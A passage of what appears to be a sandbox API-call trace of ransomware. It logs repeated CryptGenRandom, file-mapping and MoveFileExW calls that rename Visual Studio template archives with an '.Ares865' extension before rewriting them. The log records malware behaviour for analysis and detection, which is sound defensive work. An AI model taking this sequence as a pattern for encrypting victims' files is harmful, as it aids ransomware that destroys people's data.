dwFlags=0x0) returned 1 [0055.333] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x120 [0055.336] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x190000 [0055.337] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.337] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.337] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.338] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.Ares865") returned 108 [0055.338] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\form.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\form.zip.ares865"), dwFlags=0x1) returned 1 [0055.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Form.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\form.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.339] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1413) returned 1 [0055.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.339] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.340] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.340] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.340] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x890, lpName=0x0) returned 0x120 [0055.341] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x890) returned 0x190000 [0055.342] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.343] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.350] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.351] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.351] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.Ares865") returned 113 [0055.351] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\interface.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\interface.zip.ares865"), dwFlags=0x1) returned 1 [0055.352] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Interface.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\interface.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.352] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=771) returned 1 [0055.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.352] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.353] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.353] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.353] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x610, lpName=0x0) returned 0x120 [0055.354] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x610) returned 0x190000 [0055.355] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.356] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.356] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.356] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.356] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.Ares865") returned 113 [0055.356] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\mdiparent.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\mdiparent.zip.ares865"), dwFlags=0x1) returned 1 [0055.357] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\MDIParent.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\mdiparent.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.357] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=14105) returned 1 [0055.357] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.357] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.357] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.357] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.358] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.358] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.358] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3a20, lpName=0x0) returned 0x120 [0055.360] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a20) returned 0x190000 [0055.361] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.362] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.362] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.362] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.363] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.Ares865") returned 112 [0055.363] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resource.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resource.zip.ares865"), dwFlags=0x1) returned 1 [0055.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Resource.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resource.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.363] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2111) returned 1 [0055.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.364] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.364] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.365] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.365] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.366] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb40, lpName=0x0) returned 0x120 [0055.367] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb40) returned 0x190000 [0055.368] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.369] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.369] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.371] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.Ares865") returned 120 [0055.371] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resourceinternal.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resourceinternal.zip.ares865"), dwFlags=0x1) returned 1 [0055.372] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\ResourceInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\resourceinternal.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.372] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2138) returned 1 [0055.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.373] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.373] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.373] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.373] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb60, lpName=0x0) returned 0x120 [0055.375] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb60) returned 0x190000 [0055.376] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.376] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.376] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.377] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.377] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.Ares865") returned 112 [0055.377] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settings.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settings.zip.ares865"), dwFlags=0x1) returned 1 [0055.378] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\Settings.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settings.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.378] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=952) returned 1 [0055.378] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.378] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.378] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.378] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.379] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.379] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.379] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x120 [0055.381] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x190000 [0055.381] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.382] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.382] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.382] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.383] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip.Ares865") returned 120 [0055.383] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settingsinternal.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settingsinternal.zip.ares865"), dwFlags=0x1) returned 1 [0055.383] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\SettingsInternal.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\settingsinternal.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.383] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=980) returned 1 [0055.383] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.384] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.384] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.384] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.384] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.385] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x120 [0055.386] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x190000 [0055.387] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.387] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.387] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.388] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip.Ares865") returned 112 [0055.388] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\textfile.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\textfile.zip.ares865"), dwFlags=0x1) returned 1 [0055.389] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\TextFile.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\textfile.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.389] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=550) returned 1 [0055.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.389] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.390] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0055.390] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.390] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x530, lpName=0x0) returned 0x120 [0055.393] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x530) returned 0x190000 [0055.394] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0055.395] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0055.395] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0055.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5f58 [0055.396] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip.Ares865") returned 115 [0055.396] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\usercontrol.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\usercontrol.zip.ares865"), dwFlags=0x1) returned 1 [0055.396] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\UserControl.zip.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\usercontrol.zip.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0055.396] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1436) returned 1 [0055.396] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0055.397] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d5ee0 [0055.397] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0055.397] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0055.397] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: 